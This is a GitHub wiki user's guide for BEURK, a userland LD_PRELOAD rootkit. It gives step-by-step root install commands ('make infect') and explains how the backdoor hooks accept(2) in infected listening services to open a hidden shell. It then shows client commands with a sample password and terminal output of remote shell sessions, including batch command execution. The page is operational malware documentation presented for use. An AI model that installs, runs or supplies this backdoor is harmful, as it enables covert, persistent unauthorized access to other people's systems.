Skip to content

User's Guide

Jump to bottom Edit New page
Michael Zapata edited this page Nov 20, 2015 · 5 revisions

User's Guide

This guide aims to provide you with a step by step set of instuctions to use BEURK.

Installing BEURK

su -
git clone [email protected]:unix-thrust/beurk.git
cd beurk
make && make infect

Enjoy!!

Connecting to the backdoor

Requirements

The remote backdoor's gateway passes through an hooked accept(2) syscall. So an infected process must be listening on a port (for example ssh, or a web server), in order to be able to connect to it.

The backdoor only opens if the binded port is withing LOW_BACKDOOR_PORT/HIGH_BACKDOOR_PORT range. Otherwise, it will ignore the connection request.

socat-client

A small socat based client is available on /utils/socat-client.sh in order to ease shell connection.

Demonstration:

beurk@server:~/beurk$ LD_PRELOAD=./libselinux.so python -m SimpleHTTPServer
3005
Serving HTTP on 0.0.0.0 port 3005 ...

beurk@client:~/beurk$ ./utils/socat-client.sh 127.0.0.1:3005 64835
BEURK password:
Welcome to BEURK's hidden shell ...
beurk@server:~/beurk$ ls
CONTRIBUTING.md  TODO.md     includes       src    x.py
LICENSE      beurk.conf  installer.sh   tests
README.md    build       libselinux.so  utils
beurk@server:~/beurk$ exit
logout
beurk@client:~/beurk$

python-client

A client is available on /client.sh in order to ease shell connection.

Demonstration:

beurk@server:~/beurk$ LD_PRELOAD=./libselinux.so python -m SimpleHTTPServer
3005
Serving HTTP on 0.0.0.0 port 3005 ...

Usage:

beurk@client:~/beurk$ ./client.py
./client.py <address> <port> <bind_port> [password] [batch_file]
beurk@client:~/beurk$

Connection:

beurk@client:~/beurk$ ./client.py 127.0.0.1 3005 64835
beurk@client:~/beurk$ ./client.py 127.0.0.1 3005 64835
password:
Welcome to BEURK's hidden shell ...
beurk@server:/home/vagrant/beurk$ ls
CONTRIBUTING.md  README.md   includes	    reconfigure  utils
LICENSE		 TODO.md     libselinux.so  src
Makefile	 beurk.conf  obj	    tests
beurk@server:/home/vagrant/beurk$ exit
logout
beurk@client:~/beurk$

Connection with the argument password:

beurk@client:~/beurk$ ./client.py 127.0.0.1 3005 64835 b3urkR0cks

Welcome to BEURK's hidden shell ...
beurk@server:/home/vagrant/beurk$ ls
CONTRIBUTING.md  README.md   includes	    reconfigure  utils
LICENSE		 TODO.md     libselinux.so  src
Makefile	 beurk.conf  obj	    tests
beurk@server:/home/vagrant/beurk$ exit
logout
beurk@client:~/beurk$

Connection with a batch:

beurk@client:~/beurk$ cat batch.txt
ls
echo "i am a batch"
exit
beurk@client:~/beurk$ ./client.py 127.0.0.1 3005 64835 b3urkR0cks batch.txt
beurk@vagrant:/home/vagrant/beurk$ ls
CONTRIBUTING.md  README.md  beurk.conf	   obj		tests
LICENSE		 TODO.md    includes	   reconfigure	utils
Makefile	 batch.txt  libselinux.so  src
beurk@server:/home/vagrant/beurk$ echo "i am a batch"
i am a batch
beurk@server:/home/vagrant/beurk$ exit
logout
beurk@client:~/beurk$
Add a custom footer
Add a custom sidebar
Clone this wiki locally